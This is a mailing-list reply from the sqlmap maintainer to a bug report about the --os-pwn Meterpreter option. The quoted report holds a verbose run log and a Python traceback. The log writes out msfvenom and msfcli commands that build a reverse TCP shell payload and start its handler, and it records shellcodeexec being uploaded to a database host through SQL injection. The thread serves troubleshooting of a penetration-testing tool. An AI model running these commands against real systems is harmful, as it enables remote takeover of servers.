Re: [sqlmap-users] SQLmap --os-pwn Meterpreter BUG

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Not able to reproduce. Can you please send the complete output of -v 3
(even the "executing local command" parts). It seems that you are either
getting the binary shellcodeexec payload (I am getting the alphanum in both
msfvenom and non-msfvenom environment) or the remote path contains
non-ASCII chars.

Bye

On Sun, Jul 5, 2015 at 7:41 AM, Danux <da...@gm...> wrote:

> Got another error when trying to use the metasploit reverse shell option
> either default shell or Meterpreter, below the run:
>
> which payload do you want to use?
> [1] Shell (default)
> [2] Meterpreter (beta)
> > 1
> [22:36:39] [DEBUG] executing local command:
> /usr/share/metasploit-framework/msfvenom -p linux/x86/shell/reverse_tcp
> EXITFUNC=process LPORT=3000 LHOST=192.168.184.217 -a x86 -e x86/alpha_mixed
> -f raw > "/root/.sqlmap/output/cstt/tmpmgspp" BufferRegister=EAX
> [22:36:39] [INFO] creation in progress ..... done
> [22:36:44] [DEBUG] the shellcode size is 102 bytes
> what is the back-end database management system architecture?
> [1] 32-bit (default)
> [2] 64-bit
> > 1
> [22:36:47] [INFO] uploading shellcodeexec to '/tmp/tmpsegspp'
> [22:36:47] [INFO] shellcodeexec successfully uploaded
> [22:36:47] [INFO] running Metasploit Framework command line interface
> locally, please wait..
> [22:36:47] [DEBUG] executing local command:
> /usr/share/metasploit-framework/msfcli multi/handler
> PAYLOAD=linux/x86/shell/reverse_tcp EXITFUNC=process LPORT=3000
> LHOST=192.168.184.217 E
> [*] Initializing modules...
> PAYLOAD => linux/x86/shell/reverse_tcp
> EXITFUNC => process
> LPORT => 3000
> LHOST => 192.168.184.217
> [*] Started reverse handler on 192.168.184.217:3000
> [*] Starting the payload handler...
> [22:36:51] [INFO] running Metasploit Framework shellcode remotely via
> shellcodeexec, please wait..
> [22:36:51] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 6 times
> [22:36:51] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
> that some kind of protection is involved (e.g. WAF)
>
> [22:36:52] [CRITICAL] unhandled exception occurred in
> sqlmap/1.0-dev-96327b6. It is recommended to retry your run with the latest
> development version from official GitHub repository at '
> https://github.com/sqlmapproject/sqlmap'. If the exception persists,
> please open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any other information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back
> to you
> sqlmap version: 1.0-dev-96327b6
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap -u
> *********************************************************************
> --os-pwn --msf-path /usr/share/metasploit-framework/ -v3
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap", line 102, in main
>     start()
>   File "lib/controller/controller.py", line 617, in start
>     action()
>   File "lib/controller/action.py", line 163, in action
>     conf.dbmsHandler.osPwn()
>   File "plugins/generic/takeover.py", line 261, in osPwn
>     self.pwn(goUdf)
>   File "lib/takeover/metasploit.py", line 651, in pwn
>     debugMsg += "with return code %s" %
> self._controlMsfCmd(self._msfCliProc, func)
>   File "lib/takeover/metasploit.py", line 533, in _controlMsfCmd
>     func()
>   File "lib/takeover/metasploit.py", line 434, in
> _runMsfShellcodeRemoteViaSexec
>     cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString)
> UnicodeDecodeError: 'ascii' codec can't decode byte 0x89 in position 0:
> ordinal not in range(128)
>
>
> --
> DanUx
>

-- 
Miroslav Stampar
http://about.me/stamparm